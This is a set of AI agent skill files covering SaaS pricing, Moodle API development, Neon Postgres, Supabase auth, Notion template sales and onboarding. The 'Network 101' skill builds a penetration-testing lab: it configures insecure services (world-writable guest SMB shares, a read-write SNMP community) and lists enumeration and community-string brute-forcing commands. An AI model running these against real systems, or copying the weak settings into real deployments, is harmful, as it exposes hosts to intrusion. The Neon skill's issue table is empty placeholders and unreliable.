| Three tiers | Most SaaS (Good/Better/Best) |
| Usage-based | API products, variable use |
### Starting Price Framework
```
What's the alternative cost? (Competitor or manual work)
Your price = 20-50% of alternative cost
Example:
- Manual work takes 10 hours/month
- 10 hours × $50/hour = $500 value
- Price: $49-99/month
```
### Common Micro-SaaS Prices
| Type | Price Range |
|------|-------------|
| Simple tool | $9-29/month |
| Pro tool | $29-99/month |
| B2B tool | $49-299/month |
| Lifetime deal | 3-5x monthly |
### Pricing Mistakes
- Too cheap (undervalues, attracts bad customers)
- Too complex (confuses buyers)
- No free tier AND no trial (no way to try)
- Charging too late (validate with money early)
```
## Anti-Patterns
### ❌ Building in Secret
**Why bad**: No feedback loop.
Building wrong thing.
Wasted time.
Fear of shipping.
**Instead**: Launch ugly MVP.
Get feedback early.
Build in public.
Iterate based on users.
### ❌ Feature Creep
**Why bad**: Never ships.
Dilutes focus.
Confuses users.
Delays revenue.
**Instead**: One core feature first.
Ship, then iterate.
Let users tell you what's missing.
Say no to most requests.
### ❌ Pricing Too Low
**Why bad**: Undervalues your work.
Attracts price-sensitive customers.
Hard to run a business.
Can't afford growth.
**Instead**: Price for value, not time.
Start higher, discount if needed.
B2B can pay more.
Your time has value.
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Great product, no way to reach customers | high | ## Distribution First |
| Building for market that can't/won't pay | high | ## Market Selection |
| New signups leaving as fast as they come | high | ## Fixing Churn |
| Pricing page confuses potential customers | medium | ## Simple Pricing |
## Related Skills
Works well with: `landing-page-design`, `backend`, `stripe`, `seo`

597
skills/moodle-external-api-development/SKILL.md Normal file
View File

@@ -0,0 +1,597 @@
---
name: moodle-external-api-development
description: Create custom external web service APIs for Moodle LMS. Use when implementing web services for course management, user tracking, quiz operations, or custom plugin functionality. Covers parameter validation, database operations, error handling, service registration, and Moodle coding standards.
---
# Moodle External API Development
This skill guides you through creating custom external web service APIs for Moodle LMS, following Moodle's external API framework and coding standards.
## When to Use This Skill
- Creating custom web services for Moodle plugins
- Implementing REST/AJAX endpoints for course management
- Building APIs for quiz operations, user tracking, or reporting
- Exposing Moodle functionality to external applications
- Developing mobile app backends using Moodle
## Core Architecture Pattern
Moodle external APIs follow a strict three-method pattern:
1. **`execute_parameters()`** - Defines input parameter structure
2. **`execute()`** - Contains business logic
3. **`execute_returns()`** - Defines return structure
## Step-by-Step Implementation
### Step 1: Create the External API Class File
**Location**: `/local/yourplugin/classes/external/your_api_name.php`
```php
<?php
namespace local_yourplugin\external;
defined('MOODLE_INTERNAL') || die();
require_once("$CFG->libdir/externallib.php");
use external_api;
use external_function_parameters;
use external_single_structure;
use external_value;
class your_api_name extends external_api {
// Three required methods will go here
}
```
**Key Points**:
- Class must extend `external_api`
- Namespace follows: `local_pluginname\external` or `mod_modname\external`
- Include the security check: `defined('MOODLE_INTERNAL') || die();`
- Require externallib.php for base classes
### Step 2: Define Input Parameters
```php
public static function execute_parameters() {
return new external_function_parameters([
'userid' => new external_value(PARAM_INT, 'User ID', VALUE_REQUIRED),
'courseid' => new external_value(PARAM_INT, 'Course ID', VALUE_REQUIRED),
'options' => new external_single_structure([
'includedetails' => new external_value(PARAM_BOOL, 'Include details', VALUE_DEFAULT, false),
'limit' => new external_value(PARAM_INT, 'Result limit', VALUE_DEFAULT, 10)
], 'Options', VALUE_OPTIONAL)
]);
}
```
**Common Parameter Types**:
- `PARAM_INT` - Integers
- `PARAM_TEXT` - Plain text (HTML stripped)
- `PARAM_RAW` - Raw text (no cleaning)
- `PARAM_BOOL` - Boolean values
- `PARAM_FLOAT` - Floating point numbers
- `PARAM_ALPHANUMEXT` - Alphanumeric with extended chars
**Structures**:
- `external_value` - Single value
- `external_single_structure` - Object with named fields
- `external_multiple_structure` - Array of items
**Value Flags**:
- `VALUE_REQUIRED` - Parameter must be provided
- `VALUE_OPTIONAL` - Parameter is optional
- `VALUE_DEFAULT, defaultvalue` - Optional with default
### Step 3: Implement Business Logic
```php
public static function execute($userid, $courseid, $options = []) {
global $DB, $USER;
// 1. Validate parameters
$params = self::validate_parameters(self::execute_parameters(), [
'userid' => $userid,
'courseid' => $courseid,
'options' => $options
]);
// 2. Check permissions/capabilities
$context = \context_course::instance($params['courseid']);
self::validate_context($context);
require_capability('moodle/course:view', $context);
// 3. Verify user access
if ($params['userid'] != $USER->id) {
require_capability('moodle/course:viewhiddenactivities', $context);
}
// 4. Database operations
$sql = "SELECT id, name, timecreated
FROM {your_table}
WHERE userid = :userid
AND courseid = :courseid
LIMIT :limit";
$records = $DB->get_records_sql($sql, [
'userid' => $params['userid'],
'courseid' => $params['courseid'],
'limit' => $params['options']['limit']
]);
// 5. Process and return data
$results = [];
foreach ($records as $record) {
$results[] = [
'id' => $record->id,
'name' => $record->name,
'timestamp' => $record->timecreated
];
}
return [
'items' => $results,
'count' => count($results)
];
}
```
**Critical Steps**:
1. **Always validate parameters** using `validate_parameters()`
2. **Check context** using `validate_context()`
3. **Verify capabilities** using `require_capability()`
4. **Use parameterized queries** to prevent SQL injection
5. **Return structured data** matching return definition
### Step 4: Define Return Structure
```php
public static function execute_returns() {
return new external_single_structure([
'items' => new external_multiple_structure(
new external_single_structure([
'id' => new external_value(PARAM_INT, 'Item ID'),
'name' => new external_value(PARAM_TEXT, 'Item name'),
'timestamp' => new external_value(PARAM_INT, 'Creation time')
])
),
'count' => new external_value(PARAM_INT, 'Total items')
]);
}
```
**Return Structure Rules**:
- Must match exactly what `execute()` returns
- Use appropriate parameter types
- Document each field with description
- Nested structures allowed
### Step 5: Register the Service
**Location**: `/local/yourplugin/db/services.php`
```php
<?php
defined('MOODLE_INTERNAL') || die();
$functions = [
'local_yourplugin_your_api_name' => [
'classname' => 'local_yourplugin\external\your_api_name',
'methodname' => 'execute',
'classpath' => 'local/yourplugin/classes/external/your_api_name.php',
'description' => 'Brief description of what this API does',
'type' => 'read', // or 'write'
'ajax' => true,
'capabilities'=> 'moodle/course:view', // comma-separated if multiple
'services' => [MOODLE_OFFICIAL_MOBILE_SERVICE] // Optional
],
];
$services = [
'Your Plugin Web Service' => [
'functions' => [
'local_yourplugin_your_api_name'
],
'restrictedusers' => 0,
'enabled' => 1
]
];
```
**Service Registration Keys**:
- `classname` - Full namespaced class name
- `methodname` - Always 'execute'
- `type` - 'read' (SELECT) or 'write' (INSERT/UPDATE/DELETE)
- `ajax` - Set true for AJAX/REST access
- `capabilities` - Required Moodle capabilities
- `services` - Optional service bundles
### Step 6: Implement Error Handling & Logging
```php
private static function log_debug($message) {
global $CFG;
$logdir = $CFG->dataroot . '/local_yourplugin';
if (!file_exists($logdir)) {
mkdir($logdir, 0777, true);
}
$debuglog = $logdir . '/api_debug.log';
$timestamp = date('Y-m-d H:i:s');
file_put_contents($debuglog, "[$timestamp] $message\n", FILE_APPEND | LOCK_EX);
}
public static function execute($userid, $courseid) {
global $DB;
try {
self::log_debug("API called: userid=$userid, courseid=$courseid");
// Validate parameters
$params = self::validate_parameters(self::execute_parameters(), [
'userid' => $userid,
'courseid' => $courseid
]);
// Your logic here
self::log_debug("API completed successfully");
return $result;
} catch (\invalid_parameter_exception $e) {
self::log_debug("Parameter validation failed: " . $e->getMessage());
throw $e;
} catch (\moodle_exception $e) {
self::log_debug("Moodle exception: " . $e->getMessage());
throw $e;
} catch (\Exception $e) {
// Log detailed error info
$lastsql = method_exists($DB, 'get_last_sql') ? $DB->get_last_sql() : '[N/A]';
self::log_debug("Fatal error: " . $e->getMessage());
self::log_debug("Last SQL: " . $lastsql);
self::log_debug("Stack trace: " . $e->getTraceAsString());
throw $e;
}
}
```
**Error Handling Best Practices**:
- Wrap logic in try-catch blocks
- Log errors with timestamps and context
- Capture SQL queries on database errors
- Preserve stack traces for debugging
- Re-throw exceptions after logging
## Advanced Patterns
### Complex Database Operations
```php
// Transaction example
$transaction = $DB->start_delegated_transaction();
try {
// Insert record
$recordid = $DB->insert_record('your_table', $dataobject);
// Update related records
$DB->set_field('another_table', 'status', 1, ['recordid' => $recordid]);
// Commit transaction
$transaction->allow_commit();
} catch (\Exception $e) {
$transaction->rollback($e);
throw $e;
}
```
### Working with Course Modules
```php
// Create course module
$moduleid = $DB->get_field('modules', 'id', ['name' => 'quiz'], MUST_EXIST);
$cm = new \stdClass();
$cm->course = $courseid;
$cm->module = $moduleid;
$cm->instance = 0; // Will be updated after activity creation
$cm->visible = 1;
$cm->groupmode = 0;
$cmid = add_course_module($cm);
// Create activity instance (e.g., quiz)
$quiz = new \stdClass();
$quiz->course = $courseid;
$quiz->name = 'My Quiz';
$quiz->coursemodule = $cmid;
// ... other quiz fields ...
$quizid = quiz_add_instance($quiz, null);
// Update course module with instance ID
$DB->set_field('course_modules', 'instance', $quizid, ['id' => $cmid]);
course_add_cm_to_section($courseid, $cmid, 0);
```
### Access Restrictions (Groups/Availability)
```php
// Restrict activity to specific user via group
$groupname = 'activity_' . $activityid . '_user_' . $userid;
// Create or get group
if (!$groupid = $DB->get_field('groups', 'id', ['courseid' => $courseid, 'name' => $groupname])) {
$groupdata = (object)[
'courseid' => $courseid,
'name' => $groupname,
'timecreated' => time(),
'timemodified' => time()
];
$groupid = $DB->insert_record('groups', $groupdata);
}
// Add user to group
if (!$DB->record_exists('groups_members', ['groupid' => $groupid, 'userid' => $userid])) {
$DB->insert_record('groups_members', (object)[
'groupid' => $groupid,
'userid' => $userid,
'timeadded' => time()
]);
}
// Set availability condition
$restriction = [
'op' => '&',
'show' => false,
'c' => [
[
'type' => 'group',
'id' => $groupid
]
],
'showc' => [false]
];
$DB->set_field('course_modules', 'availability', json_encode($restriction), ['id' => $cmid]);
```
### Random Question Selection with Tags
```php
private static function get_random_questions($categoryid, $tagname, $limit) {
global $DB;
$sql = "SELECT q.id
FROM {question} q
INNER JOIN {question_versions} qv ON qv.questionid = q.id
INNER JOIN {question_bank_entries} qbe ON qbe.id = qv.questionbankentryid
INNER JOIN {question_categories} qc ON qc.id = qbe.questioncategoryid
JOIN {tag_instance} ti ON ti.itemid = q.id
JOIN {tag} t ON t.id = ti.tagid
WHERE LOWER(t.name) = :tagname
AND qc.id = :categoryid
AND ti.itemtype = 'question'
AND q.qtype = 'multichoice'";
$qids = $DB->get_fieldset_sql($sql, [
'categoryid' => $categoryid,
'tagname' => strtolower($tagname)
]);
shuffle($qids);
return array_slice($qids, 0, $limit);
}
```
## Testing Your API
### 1. Via Moodle Web Services Test Client
1. Enable web services: **Site administration > Advanced features**
2. Enable REST protocol: **Site administration > Plugins > Web services > Manage protocols**
3. Create service: **Site administration > Server > Web services > External services**
4. Test function: **Site administration > Development > Web service test client**
### 2. Via curl
```bash
# Get token first
curl -X POST "https://yourmoodle.com/login/token.php" \
-d "username=admin" \
-d "password=yourpassword" \
-d "service=moodle_mobile_app"
# Call your API
curl -X POST "https://yourmoodle.com/webservice/rest/server.php" \
-d "wstoken=YOUR_TOKEN" \
-d "wsfunction=local_yourplugin_your_api_name" \
-d "moodlewsrestformat=json" \
-d "userid=2" \
-d "courseid=3"
```
### 3. Via JavaScript (AJAX)
```javascript
require(['core/ajax'], function(ajax) {
var promises = ajax.call([{
methodname: 'local_yourplugin_your_api_name',
args: {
userid: 2,
courseid: 3
}
}]);
promises[0].done(function(response) {
console.log('Success:', response);
}).fail(function(error) {
console.error('Error:', error);
});
});
```
## Common Pitfalls & Solutions
### 1. "Function not found" Error
**Solution**:
- Purge caches: **Site administration > Development > Purge all caches**
- Verify function name in services.php matches exactly
- Check namespace and class name are correct
### 2. "Invalid parameter value detected"
**Solution**:
- Ensure parameter types match between definition and usage
- Check required vs optional parameters
- Validate nested structure definitions
### 3. SQL Injection Vulnerabilities
**Solution**:
- Always use placeholder parameters (`:paramname`)
- Never concatenate user input into SQL strings
- Use Moodle's database methods: `get_record()`, `get_records()`, etc.
### 4. Permission Denied Errors
**Solution**:
- Call `self::validate_context($context)` early in execute()
- Check required capabilities match user's permissions
- Verify user has role assignments in the context
### 5. Transaction Deadlocks
**Solution**:
- Keep transactions short
- Always commit or rollback in finally blocks
- Avoid nested transactions
## Debugging Checklist
- [ ] Check Moodle debug mode: **Site administration > Development > Debugging**
- [ ] Review web services logs: **Site administration > Reports > Logs**
- [ ] Check custom log files in `$CFG->dataroot/local_yourplugin/`
- [ ] Verify database queries using `$DB->set_debug(true)`
- [ ] Test with admin user to rule out permission issues
- [ ] Clear browser cache and Moodle caches
- [ ] Check PHP error logs on server
## Plugin Structure Checklist
```
local/yourplugin/
├── version.php # Plugin version and metadata
├── db/
│ ├── services.php # External service definitions
│ └── access.php # Capability definitions (optional)
├── classes/
│ └── external/
│ ├── your_api_name.php # External API implementation
│ └── another_api.php # Additional APIs
├── lang/
│ └── en/
│ └── local_yourplugin.php # Language strings
└── tests/
└── external_test.php # Unit tests (optional but recommended)
```
## Examples from Real Implementation
### Simple Read API (Get Quiz Attempts)
```php
<?php
namespace local_userlog\external;
defined('MOODLE_INTERNAL') || die();
require_once("$CFG->libdir/externallib.php");
use external_api;
use external_function_parameters;
use external_single_structure;
use external_value;
class get_quiz_attempts extends external_api {
public static function execute_parameters() {
return new external_function_parameters([
'userid' => new external_value(PARAM_INT, 'User ID'),
'courseid' => new external_value(PARAM_INT, 'Course ID')
]);
}
public static function execute($userid, $courseid) {
global $DB;
self::validate_parameters(self::execute_parameters(), [
'userid' => $userid,
'courseid' => $courseid
]);
$sql = "SELECT COUNT(*) AS quiz_attempts
FROM {quiz_attempts} qa
JOIN {quiz} q ON qa.quiz = q.id
WHERE qa.userid = :userid AND q.course = :courseid";
$attempts = $DB->get_field_sql($sql, [
'userid' => $userid,
'courseid' => $courseid
]);
return ['quiz_attempts' => (int)$attempts];
}
public static function execute_returns() {
return new external_single_structure([
'quiz_attempts' => new external_value(PARAM_INT, 'Total number of quiz attempts')
]);
}
}
```
### Complex Write API (Create Quiz from Categories)
See attached `create_quiz_from_categories.php` for a comprehensive example including:
- Multiple database insertions
- Course module creation
- Quiz instance configuration
- Random question selection with tags
- Group-based access restrictions
- Extensive error logging
- Transaction management
## Quick Reference: Common Moodle Tables
| Table | Purpose |
|-------|---------|
| `{user}` | User accounts |
| `{course}` | Courses |
| `{course_modules}` | Activity instances in courses |
| `{modules}` | Available activity types (quiz, forum, etc.) |
| `{quiz}` | Quiz configurations |
| `{quiz_attempts}` | Quiz attempt records |
| `{question}` | Question bank |
| `{question_categories}` | Question categories |
| `{grade_items}` | Gradebook items |
| `{grade_grades}` | Student grades |
| `{groups}` | Course groups |
| `{groups_members}` | Group memberships |
| `{logstore_standard_log}` | Activity logs |
## Additional Resources
- [Moodle External API Documentation](https://moodledev.io/docs/5.2/apis/subsystems/external/functions)
- [Moodle Coding Style](https://moodledev.io/general/development/policies/codingstyle)
- [Moodle Database API](https://moodledev.io/docs/5.2/apis/core/dml)
- [Web Services API Documentation](https://moodledev.io/docs/5.2/apis/subsystems/external)
## Guidelines
- Always validate input parameters using `validate_parameters()`
- Check user context and capabilities before operations
- Use parameterized SQL queries (never string concatenation)
- Implement comprehensive error handling and logging
- Follow Moodle naming conventions (lowercase, underscores)
- Document all parameters and return values clearly
- Test with different user roles and permissions
- Consider transaction safety for write operations
- Purge caches after service registration changes
- Keep API methods focused and single-purpose

56
skills/neon-postgres/SKILL.md Normal file
View File

@@ -0,0 +1,56 @@
---
name: neon-postgres
description: "Expert patterns for Neon serverless Postgres, branching, connection pooling, and Prisma/Drizzle integration Use when: neon database, serverless postgres, database branching, neon postgres, postgres serverless."
source: vibeship-spawner-skills (Apache 2.0)
---
# Neon Postgres
## Patterns
### Prisma with Neon Connection
Configure Prisma for Neon with connection pooling.
Use two connection strings:
- DATABASE_URL: Pooled connection for Prisma Client
- DIRECT_URL: Direct connection for Prisma Migrate
The pooled connection uses PgBouncer for up to 10K connections.
Direct connection required for migrations (DDL operations).
### Drizzle with Neon Serverless Driver
Use Drizzle ORM with Neon's serverless HTTP driver for
edge/serverless environments.
Two driver options:
- neon-http: Single queries over HTTP (fastest for one-off queries)
- neon-serverless: WebSocket for transactions and sessions
### Connection Pooling with PgBouncer
Neon provides built-in connection pooling via PgBouncer.
Key limits:
- Up to 10,000 concurrent connections to pooler
- Connections still consume underlying Postgres connections
- 7 connections reserved for Neon superuser
Use pooled endpoint for application, direct for migrations.
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | low | See docs |
| Issue | medium | See docs |
| Issue | high | See docs |

339
skills/network-101/SKILL.md Normal file
View File

@@ -0,0 +1,339 @@
---
name: Network 101
description: This skill should be used when the user asks to "set up a web server", "configure HTTP or HTTPS", "perform SNMP enumeration", "configure SMB shares", "test network services", or needs guidance on configuring and testing network services for penetration testing labs.
---
# Network 101
## Purpose
Configure and test common network services (HTTP, HTTPS, SNMP, SMB) for penetration testing lab environments. Enable hands-on practice with service enumeration, log analysis, and security testing against properly configured target systems.
## Inputs/Prerequisites
- Windows Server or Linux system for hosting services
- Kali Linux or similar for testing
- Administrative access to target system
- Basic networking knowledge (IP addressing, ports)
- Firewall access for port configuration
## Outputs/Deliverables
- Configured HTTP/HTTPS web server
- SNMP service with accessible communities
- SMB file shares with various permission levels
- Captured logs for analysis
- Documented enumeration results
## Core Workflow
### 1. Configure HTTP Server (Port 80)
Set up a basic HTTP web server for testing:
**Windows IIS Setup:**
1. Open IIS Manager (Internet Information Services)
2. Right-click Sites → Add Website
3. Configure site name and physical path
4. Bind to IP address and port 80
**Linux Apache Setup:**
```bash
# Install Apache
sudo apt update && sudo apt install apache2
# Start service
sudo systemctl start apache2
sudo systemctl enable apache2
# Create test page
echo "<html><body><h1>Test Page</h1></body></html>" | sudo tee /var/www/html/index.html
# Verify service
curl http://localhost
```
**Configure Firewall for HTTP:**
```bash
# Linux (UFW)
sudo ufw allow 80/tcp
# Windows PowerShell
New-NetFirewallRule -DisplayName "HTTP" -Direction Inbound -Protocol TCP -LocalPort 80 -Action Allow
```
### 2. Configure HTTPS Server (Port 443)
Set up secure HTTPS with SSL/TLS:
**Generate Self-Signed Certificate:**
```bash
# Linux - Generate certificate
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/private/apache-selfsigned.key \
-out /etc/ssl/certs/apache-selfsigned.crt
# Enable SSL module
sudo a2enmod ssl
sudo systemctl restart apache2
```
**Configure Apache for HTTPS:**
```bash
# Edit SSL virtual host
sudo nano /etc/apache2/sites-available/default-ssl.conf
# Enable site
sudo a2ensite default-ssl
sudo systemctl reload apache2
```
**Verify HTTPS Setup:**
```bash
# Check port 443 is open
nmap -p 443 192.168.1.1
# Test SSL connection
openssl s_client -connect 192.168.1.1:443
# Check certificate
curl -kv https://192.168.1.1
```
### 3. Configure SNMP Service (Port 161)
Set up SNMP for enumeration practice:
**Linux SNMP Setup:**
```bash
# Install SNMP daemon
sudo apt install snmpd snmp
# Configure community strings
sudo nano /etc/snmp/snmpd.conf
# Add these lines:
# rocommunity public
# rwcommunity private
# Restart service
sudo systemctl restart snmpd
```
**Windows SNMP Setup:**
1. Open Server Manager → Add Features
2. Select SNMP Service
3. Configure community strings in Services → SNMP Service → Properties
**SNMP Enumeration Commands:**
```bash
# Basic SNMP walk
snmpwalk -c public -v1 192.168.1.1
# Enumerate system info
snmpwalk -c public -v1 192.168.1.1 1.3.6.1.2.1.1
# Get running processes
snmpwalk -c public -v1 192.168.1.1 1.3.6.1.2.1.25.4.2.1.2
# SNMP check tool
snmp-check 192.168.1.1 -c public
# Brute force community strings
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.1
```
### 4. Configure SMB Service (Port 445)
Set up SMB file shares for enumeration:
**Windows SMB Share:**
1. Create folder to share
2. Right-click → Properties → Sharing → Advanced Sharing
3. Enable sharing and set permissions
4. Configure NTFS permissions
**Linux Samba Setup:**
```bash
# Install Samba
sudo apt install samba
# Create share directory
sudo mkdir -p /srv/samba/share
sudo chmod 777 /srv/samba/share
# Configure Samba
sudo nano /etc/samba/smb.conf
# Add share:
# [public]
# path = /srv/samba/share
# browsable = yes
# guest ok = yes
# read only = no
# Restart service
sudo systemctl restart smbd
```
**SMB Enumeration Commands:**
```bash
# List shares anonymously
smbclient -L //192.168.1.1 -N
# Connect to share
smbclient //192.168.1.1/share -N
# Enumerate with smbmap
smbmap -H 192.168.1.1
# Full enumeration
enum4linux -a 192.168.1.1
# Check for vulnerabilities
nmap --script smb-vuln* 192.168.1.1
```
### 5. Analyze Service Logs
Review logs for security analysis:
**HTTP/HTTPS Logs:**
```bash
# Apache access log
sudo tail -f /var/log/apache2/access.log
# Apache error log
sudo tail -f /var/log/apache2/error.log
# Windows IIS logs
# Location: C:\inetpub\logs\LogFiles\W3SVC1\
```
**Parse Log for Credentials:**
```bash
# Search for POST requests
grep "POST" /var/log/apache2/access.log
# Extract user agents
awk '{print $12}' /var/log/apache2/access.log | sort | uniq -c
```
## Quick Reference
### Essential Ports
| Service | Port | Protocol |
|---------|------|----------|
| HTTP | 80 | TCP |
| HTTPS | 443 | TCP |
| SNMP | 161 | UDP |
| SMB | 445 | TCP |
| NetBIOS | 137-139 | TCP/UDP |
### Service Verification Commands
```bash
# Check HTTP
curl -I http://target
# Check HTTPS
curl -kI https://target
# Check SNMP
snmpwalk -c public -v1 target
# Check SMB
smbclient -L //target -N
```
### Common Enumeration Tools
| Tool | Purpose |
|------|---------|
| nmap | Port scanning and scripts |
| nikto | Web vulnerability scanning |
| snmpwalk | SNMP enumeration |
| enum4linux | SMB/NetBIOS enumeration |
| smbclient | SMB connection |
| gobuster | Directory brute forcing |
## Constraints
- Self-signed certificates trigger browser warnings
- SNMP v1/v2c communities transmit in cleartext
- Anonymous SMB access is often disabled by default
- Firewall rules must allow inbound connections
- Lab environments should be isolated from production
## Examples
### Example 1: Complete HTTP Lab Setup
```bash
# Install and configure
sudo apt install apache2
sudo systemctl start apache2
# Create login page
cat << 'EOF' | sudo tee /var/www/html/login.html
<html>
<body>
<form method="POST" action="login.php">
Username: <input type="text" name="user"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Login">
</form>
</body>
</html>
EOF
# Allow through firewall
sudo ufw allow 80/tcp
```
### Example 2: SNMP Testing Setup
```bash
# Quick SNMP configuration
sudo apt install snmpd
echo "rocommunity public" | sudo tee -a /etc/snmp/snmpd.conf
sudo systemctl restart snmpd
# Test enumeration
snmpwalk -c public -v1 localhost
```
### Example 3: SMB Anonymous Access
```bash
# Configure anonymous share
sudo apt install samba
sudo mkdir /srv/samba/anonymous
sudo chmod 777 /srv/samba/anonymous
# Test access
smbclient //localhost/anonymous -N
```
## Troubleshooting
| Issue | Solution |
|-------|----------|
| Port not accessible | Check firewall rules (ufw, iptables, Windows Firewall) |
| Service not starting | Check logs with `journalctl -u service-name` |
| SNMP timeout | Verify UDP 161 is open, check community string |
| SMB access denied | Verify share permissions and user credentials |
| HTTPS certificate error | Accept self-signed cert or add to trusted store |
| Cannot connect remotely | Bind service to 0.0.0.0 instead of localhost |

56
skills/nextjs-supabase-auth/SKILL.md Normal file
View File

@@ -0,0 +1,56 @@
---
name: nextjs-supabase-auth
description: "Expert integration of Supabase Auth with Next.js App Router Use when: supabase auth next, authentication next.js, login supabase, auth middleware, protected route."
source: vibeship-spawner-skills (Apache 2.0)
---
# Next.js + Supabase Auth
You are an expert in integrating Supabase Auth with Next.js App Router.
You understand the server/client boundary, how to handle auth in middleware,
Server Components, Client Components, and Server Actions.
Your core principles:
1. Use @supabase/ssr for App Router integration
2. Handle tokens in middleware for protected routes
3. Never expose auth tokens to client unnecessarily
4. Use Server Actions for auth operations when possible
5. Understand the cookie-based session flow
## Capabilities
- nextjs-auth
- supabase-auth-nextjs
- auth-middleware
- auth-callback
## Requirements
- nextjs-app-router
- supabase-backend
## Patterns
### Supabase Client Setup
Create properly configured Supabase clients for different contexts
### Auth Middleware
Protect routes and refresh sessions in middleware
### Auth Callback Route
Handle OAuth callback and exchange code for session
## Anti-Patterns
### ❌ getSession in Server Components
### ❌ Auth State in Client Without Listener
### ❌ Storing Tokens Manually
## Related Skills
Works well with: `nextjs-app-router`, `supabase-backend`

216
skills/notion-template-business/SKILL.md Normal file
View File

@@ -0,0 +1,216 @@
---
name: notion-template-business
description: "Expert in building and selling Notion templates as a business - not just making templates, but building a sustainable digital product business. Covers template design, pricing, marketplaces, marketing, and scaling to real revenue. Use when: notion template, sell templates, digital product, notion business, gumroad."
source: vibeship-spawner-skills (Apache 2.0)
---
# Notion Template Business
**Role**: Template Business Architect
You know templates are real businesses that can generate serious income.
You've seen creators make six figures selling Notion templates. You
understand it's not about the template - it's about the problem it solves.
You build systems that turn templates into scalable digital products.
## Capabilities
- Notion template design
- Template pricing strategies
- Gumroad/Lemon Squeezy setup
- Template marketing
- Notion marketplace strategy
- Template support systems
- Template documentation
- Bundle strategies
## Patterns
### Template Design
Creating templates people pay for
**When to use**: When designing a Notion template
```javascript
## Template Design
### What Makes Templates Sell
| Factor | Why It Matters |
|--------|----------------|
| Solves specific problem | Clear value proposition |
| Beautiful design | First impression, shareability |
| Easy to customize | Users make it their own |
| Good documentation | Reduces support, increases satisfaction |
| Comprehensive | Feels worth the price |
### Template Structure
```
Template Package:
├── Main Template
│ ├── Dashboard (first impression)
│ ├── Core Pages (main functionality)
│ ├── Supporting Pages (extras)
│ └── Examples/Sample Data
├── Documentation
│ ├── Getting Started Guide
│ ├── Feature Walkthrough
│ └── FAQ
└── Bonus
├── Icon Pack
└── Color Themes
```
### Design Principles
- Clean, consistent styling
- Clear hierarchy and navigation
- Helpful empty states
- Example data to show possibilities
- Mobile-friendly views
### Template Categories That Sell
| Category | Examples |
|----------|----------|
| Productivity | Second brain, task management |
| Business | CRM, project management |
| Personal | Finance tracker, habit tracker |
| Education | Study system, course notes |
| Creative | Content calendar, portfolio |
```
### Pricing Strategy
Pricing Notion templates for profit
**When to use**: When setting template prices
```javascript
## Template Pricing
### Price Anchoring
| Tier | Price Range | What to Include |
|------|-------------|-----------------|
| Basic | $15-29 | Core template only |
| Pro | $39-79 | Template + extras |
| Ultimate | $99-199 | Everything + updates |
### Pricing Factors
```
Value created:
- Time saved per month × 12 months
- Problems solved
- Comparable products cost
Example:
- Saves 5 hours/month
- 5 hours × $50/hour × 12 = $3000 value
- Price at $49-99 (1-3% of value)
```
### Bundle Strategy
- Individual templates: $29-49
- Bundle of 3-5: $79-129 (30% off)
- All-access: $149-299 (best value)
### Free vs Paid
| Free Template | Purpose |
|---------------|---------|
| Lead magnet | Email list growth |
| Upsell vehicle | "Get the full version" |
| Social proof | Reviews, shares |
| SEO | Traffic to paid |
```
### Sales Channels
Where to sell templates
**When to use**: When setting up sales
```javascript
## Sales Channels
### Platform Comparison
| Platform | Fee | Pros | Cons |
|----------|-----|------|------|
| Gumroad | 10% | Simple, trusted | Higher fees |
| Lemon Squeezy | 5-8% | Modern, lower fees | Newer |
| Notion Marketplace | 0% | Built-in audience | Approval needed |
| Your site | 3% (Stripe) | Full control | Build audience |
### Gumroad Setup
```
1. Create account
2. Add product
3. Upload template (duplicate link)
4. Write compelling description
5. Add preview images/video
6. Set price
7. Enable discounts
8. Publish
```
### Notion Marketplace
- Apply as creator
- Higher quality bar
- Built-in discovery
- Lower individual prices
- Good for volume
### Your Own Site
- Use Lemon Squeezy embed
- Custom landing pages
- Build email list
- Full brand control
```
## Anti-Patterns
### ❌ Building Without Audience
**Why bad**: No one knows about you.
Launch to crickets.
No email list.
No social following.
**Instead**: Build audience first.
Share work publicly.
Give away free templates.
Grow email list.
### ❌ Too Niche or Too Broad
**Why bad**: "Notion template" = too vague.
"Notion for left-handed fishermen" = too niche.
No clear buyer.
Weak positioning.
**Instead**: Specific but sizable market.
"Notion for freelancers"
"Notion for students"
"Notion for small teams"
### ❌ No Support System
**Why bad**: Support requests pile up.
Bad reviews.
Refund requests.
Stressful.
**Instead**: Great documentation.
Video walkthrough.
FAQ page.
Email/chat for premium.
## ⚠️ Sharp Edges
| Issue | Severity | Solution |
|-------|----------|----------|
| Templates getting shared/pirated | medium | ## Handling Template Piracy |
| Drowning in customer support requests | medium | ## Scaling Template Support |
| All sales from one marketplace | medium | ## Diversifying Sales Channels |
| Old templates becoming outdated | low | ## Template Update Strategy |
## Related Skills
Works well with: `micro-saas-launcher`, `copywriting`, `landing-page-design`, `seo`

433
skills/onboarding-cro/SKILL.md Normal file
View File

@@ -0,0 +1,433 @@
---
name: onboarding-cro
description: When the user wants to optimize post-signup onboarding, user activation, first-run experience, or time-to-value. Also use when the user mentions "onboarding flow," "activation rate," "user activation," "first-run experience," "empty states," "onboarding checklist," "aha moment," or "new user experience." For signup/registration optimization, see signup-flow-cro. For ongoing email sequences, see email-sequence.
---
# Onboarding CRO
You are an expert in user onboarding and activation. Your goal is to help users reach their "aha moment" as quickly as possible and establish habits that lead to long-term retention.
## Initial Assessment
Before providing recommendations, understand:
1. **Product Context**
- What type of product? (SaaS tool, marketplace, app, etc.)
- B2B or B2C?
- What's the core value proposition?
2. **Activation Definition**
- What's the "aha moment" for your product?
- What action indicates a user "gets it"?
- What's your current activation rate?
3. **Current State**
- What happens immediately after signup?
- Is there an existing onboarding flow?
- Where do users currently drop off?
---
## Core Principles
### 1. Time-to-Value Is Everything
- How quickly can someone experience the core value?
- Remove every step between signup and that moment
- Consider: Can they experience value BEFORE signup?
### 2. One Goal Per Session
- Don't try to teach everything at once
- Focus first session on one successful outcome
- Save advanced features for later
### 3. Do, Don't Show
- Interactive > Tutorial
- Doing the thing > Learning about the thing
- Show UI in context of real tasks
### 4. Progress Creates Motivation
- Show advancement
- Celebrate completions
- Make the path visible
---
## Defining Activation
